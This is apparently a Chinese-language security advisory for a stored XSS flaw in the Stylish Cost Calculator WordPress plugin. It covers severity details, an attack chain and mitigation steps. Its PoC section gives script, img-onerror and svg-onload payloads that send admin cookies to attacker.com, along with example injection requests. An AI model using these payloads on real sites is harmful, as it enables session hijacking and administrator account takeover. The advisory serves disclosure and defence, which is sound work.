CVE-2026-24630 Stylish Cost Calculator存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2026-24630

漏洞类型

存储型XSS (Cross-site Scripting)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Stylish Cost Calculator WordPress插件

漏洞概述

CVE-2026-24630是WordPress插件Stylish Cost Calculator中的一个存储型跨站脚本(XSS)漏洞。该漏洞由于插件在Web页面生成过程中未对用户输入进行适当的过滤和转义，导致恶意JavaScript代码可以被存储在数据库中。当其他用户访问包含恶意代码的页面时，攻击者注入的脚本将在受害者浏览器中执行，从而窃取会话Cookie、劫持用户账户或进行其他恶意操作。攻击者利用该漏洞需要具有低权限用户账户（如订阅者或贡献者角色），并需要诱导高权限用户（如管理员）访问包含恶意内容的页面。由于存储型XSS的持久性特点，攻击一旦成功，恶意代码将在所有访问受影响页面的用户浏览器中执行，危害范围广泛。该漏洞影响Stylish Cost Calculator从某个未知版本到8.2.9的所有版本。

技术细节

该漏洞属于典型的存储型反射型XSS漏洞。在Stylish Cost Calculator插件的多个输入字段中，插件未能对用户提交的数据进行充分的输入验证和输出编码。攻击者可以在计算器配置、表单字段或其他输入点注入恶意JavaScript代码（如<script>alert(document.cookie)</script>）。这些数据被直接存储在WordPress数据库中，当管理员或用户在前端访问相关页面时，未经过滤的内容会被直接嵌入到HTML响应中。现代浏览器会执行嵌入的JavaScript代码，使攻击者能够窃取用户的认证令牌、会话ID或其他敏感信息。攻击者通常利用此漏洞进行会话劫持、凭据盗窃或进一步横向移动到管理后台。由于该插件常用于商业网站，攻击者可能通过此漏洞获取商业敏感信息或进行金融欺诈。

攻击链分析

STEP 1

步骤1

攻击者注册一个低权限WordPress账户（如订阅者角色），获取基本访问权限

STEP 2

步骤2

攻击者访问包含Stylish Cost Calculator插件的页面，找到可注入的输入字段

STEP 3

步骤3

在计算器配置或表单字段中注入恶意JavaScript代码（如<script>标签或事件处理器）

STEP 4

步骤4

提交包含XSS payload的数据，插件将恶意代码未经过滤地存储到WordPress数据库

STEP 5

步骤5

当管理员或其他高权限用户访问包含恶意内容的页面时，浏览器执行注入的JavaScript代码

STEP 6

步骤6

恶意脚本窃取用户的会话Cookie或管理员凭据，并发送到攻击者控制的服务器

STEP 7

步骤7

攻击者利用窃取的凭据劫持会话，进一步控制WordPress后台或进行横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2026-24630 PoC - Stored XSS in Stylish Cost Calculator // Author: [email protected] // 1. 首先创建一个WordPress账户（低权限如subscriber） // 2. 登录后导航到包含Stylish Cost Calculator的页面 // 3. 在计算器输入字段中注入以下XSS payload: const xssPayload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie)</script>'; // 或者使用事件处理器绕过过滤: const altPayload = '<img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> '; const altPayload2 = '<svg/onload=fetch("https://attacker.com/steal?c="+btoa(document.cookie))>'; // 4. 提交表单或保存计算器配置 // 5. 当管理员访问该页面时，payload会自动执行 // 6. 攻击者服务器会接收到管理员的Cookie // 完整攻击流程: // Step 1: 注册低权限WordPress用户 // POST /wp-login.php?action=register // username=attacker&[email protected] // Step 2: 注入XSS payload到计算器字段 // POST /wp-admin/admin-ajax.php // action=stylish_cost_calculator_save&calculator_id=1&field_name="<script>alert(document.domain)</script>" // Step 3: 等待管理员访问触发XSS // 恶意JavaScript会将管理员Cookie发送到攻击者控制的服务器

影响范围

Stylish Cost Calculator <= 8.2.9

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1) 使用WordPress安全插件（如Wordfence、Sucuri）添加额外的XSS防护层；2) 限制低权限用户对计算器功能的访问；3) 临时禁用受影响的计算器功能；4) 启用Web应用防火墙规则阻断可疑的JavaScript注入请求；5) 监控日志中的异常请求模式；6) 考虑暂时使用替代插件。同时建议检查现有数据库中是否已存在恶意代码，并及时清理。